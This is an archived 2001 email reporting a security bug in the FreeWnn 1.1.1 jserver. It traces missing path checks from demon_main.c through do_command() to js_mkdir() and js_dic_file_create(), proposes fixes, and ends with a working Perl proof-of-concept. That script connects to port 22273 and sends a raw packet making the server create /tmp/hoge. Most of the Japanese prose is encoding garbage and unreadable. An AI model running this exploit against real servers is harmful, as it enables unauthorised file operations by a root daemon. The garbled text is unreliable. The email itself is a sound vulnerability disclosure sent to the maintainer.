- To: hiroo@oikumene.gcd.org
- Subject: Re: security bug report
- From: yusuke@kmc.kyoto-u.ac.jp (TABATA yusuke)
- Date: Tue, 14 Aug 2001 21:44:48 +0900 (JST)
- Cc: yusuke@kmc.kyoto-u.ac.jp
- Delivered-To: hiroo@oikumene.gcd.org
- In-Reply-To: Your message of "Tue, 14 Aug 2001 21:06:53 +0900".<20010814210653L.hiroo@oikumene.gcd.org>
�$BEDH*$G$9�(B
�$B%a%$%j%s%0%j%9%H$K$O;22C$7$F$$$J$$$N$G�(B
�$B>.Ln$5$s$N$_$X$N%j%W%i%$$H$J$j$^$9!#E>Aw$J$I$O8f<+M3$K$I$&$>!#�(B
<20010814210653L.hiroo@oikumene.gcd.org>�$B$N5-;v$K$*$$$F�(B
hiroo@oikumene.gcd.org�$B$5$s$O=q$-$^$7$?!#�(B
>> �$BEDH*$5$s$,%A%'%C%/$5$l$?�(B FreeWnn �$B$N%P!<%8%g%s$H!"%=!<%9%3!<%I$N3:Ev$9�(B
>> �$B$k2U=j$r65$($FD:$1$J$$$G$7$g$&$+!#�(B
FreeWnn-1.1.1-a17�$B$G$9!#�(B
exploit�$B%W%m%0%i%`$N40A4HG$O:G8e$KIU$1$^$9�(B(�$B<c43>iD9$J%=!<%9$G$9$,�(B)
jserver/de.c �$B$N�(Bdemon_main.c() �$B$G%Q%1%C%H$r<u$1$H$j�(B
jserver/dispatch.c �$B$N�(B do_command() �$BCf$N�(Bswitch�$BJ8$G�(B
js_mkdir()�$B$d�(B js_dic_file_create()�$B$r7P$F<B:]$N%U%!%$%kA`:n$X;j$k$^$G$N�(B
�$B%Q%9$G%A%'%C%/$,9T$J$o$l$F$$$J$$$H$$$&$3$H$,LdBj$N$h$&$G$9!#�(B
�$BB>$K$b$"$k$H;W$$$^$9$N$G%A%'%C%/$r$*4j$$$7$^$9!#�(B
>> �$B$3$l$+$iD4::$9$k$H$3$m$G$9$,!"Js9p$7$FD:$$$?FbMF$+$i$9$k$H!"�(BWnn �$B$N%W%m�(B
>> �$B%H%3%k$N@5Ev$JMW5a$N$h$&$J$N$G�(B (�$BKR2NE*$J;~Be$K:n$i$l$?$b$N$H$$$&$3$H$J�(B
>> �$B$N$G$7$g$&$,�(B)�$B!"$h$/9M$($FJQ99$r2C$($kI,MW$,$"$k$H;W$C$F$$$^$9!#�(B
>> (cf. [freewnn:00683])
>> �$BBP:v$K$D$$$FDs0F$,$"$l$P4?7^CW$7$^$9!#�(B
�$BBP:v$H$7$F$O�(B
*root�$B$G5/F0$7$?:]$K$O�(BTCP�$B$K$h$k@\B3$O<u$1$J$$�(B
*root�$B$GF0$+$7$F$O$$$1$J$$$3$H$rL@5-$9$k�(B/root�$B$G$OF0$+$J$$$h$&$K$9$k�(B
*�$B<-=q$N%G%#%l%/%H%j$N30$K$O%U%!%$%kA`:n$r$G$-$J$$$h$&$K$9$k�(B
*�$BFCDj$NL>A0$N%Q%?!<%s$r;}$C$?%U%!%$%k0J30$OA`:n$G$-$J$$$h$&$K$9$k�(B
*Wnn6�$B$HF1$8�(Bwnnhosts�$B$r:NMQ$9$k!"$?$@$7$3$N%"%/%;%9%3%s%H%m!<%k$O@\B3;~$K9T$&�(B
�$B$J$I$,;W$$$D$-$^$9!#�(B
>> �$B;CDj:v�(B (workaround)�$B!"915W:v�(B (solution) �$B$,Dj$^$j<!BhJs9p$7$?$$$H9M$($F�(B
>> �$B$$$^$9$,!"$=$&$$$&$o$1$G!":#$9$0$O<($;$^$;$s!#�(B
solution�$B$r9M$($k:]$K$O�(B
*�$B<-=q%U%!%$%k$N%W%i%$%P%7!<�(B
*�$BG'>Z�(B
*�$BDL?.$N0E9f2=�(B
�$B$J$I$b8!F$$r$*4j$$$7$^$9!#�(B
�$B0J2<$O>iD9$G$9$,!"LdBj$r0z$-5/$3$9%W%m%0%i%`$G$9�(B
#! /usr/bin/perl
($them,$port) = @ARGV;
$port = 22273 unless $port;
$them = 'localhost' unless $them;
$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }
use Socket;
$sockaddr = 'S n a4 x8';
chop($hostname = `hostname`);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($name, $aliases, $type, $len, $thisaddr) =
gethostbyname($hostname);
($name, $aliases, $type, $len, $thataddr) = gethostbyname($them);
$this = pack($sockaddr, &AF_INET, 0, $thisaddr);
$that = pack($sockaddr, &AF_INET, $port, $thataddr);
socket(S, &PF_INET, &SOCK_STREAM, $proto) || die "socket: $!";
# bind(S, $this) || die "bind: $!";
connect(S, $that) || die "connect: $!";
select(S); $| = 1; select(STDOUT);
print "connected!";
if ($child = fork) {
print STDOUT "send";
print S "\x00\x00\x00\x66\x00\x00\x00\x00".
"/tmp/hoge\x00".
"\x00\x00\x00\x00\x00\x00\x00\x03";
print STDOUT ".done.\n";
sleep 3;
do dokill();
}
else {
while (<S>) {
print;
}
}